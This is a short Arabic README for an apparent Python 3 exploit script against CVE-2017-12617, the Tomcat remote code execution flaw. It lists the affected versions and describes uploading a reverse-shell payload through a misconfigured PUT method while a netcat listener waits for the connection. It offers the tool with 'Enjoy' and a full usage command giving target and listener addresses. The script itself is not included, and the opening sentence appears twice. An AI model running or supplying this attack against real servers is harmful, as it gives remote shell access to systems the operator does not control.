
CVE-2017-12617 هي ثغرة أمنية حرجة تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) في Apache Tomcat.
CVE-2017-12617 هي ثغرة أمنية خطيرة تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) في Apache Tomcat.
تعمل هذه الثغرة على الإصدارات 9.0.0.M1 - 9.0.0، 8.5.0-8.5.22، 8.0.0.RC1 - 8.0.46، و7.0.0 - 7.0.81.
تم اختبارها فقط على الإصدار 8.0.24. تستخدم الثغرة خيار PUT الذي تم تكوينه بشكل خاطئ في التطبيق أو في مثيل Tomcat نفسه.
تستخدم PUT لإرسال حمولة reverse shell إلى الخادم وتنفيذها، مع الاستماع عبر netcat.
نظرًا لوجود العديد من النسخ من نفس الاستغلال على الإنترنت لكنها مبنية على python2، فقد أعدت كتابته ليعمل مع Python 3.
استمتع.
مثال على الاستخدام:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
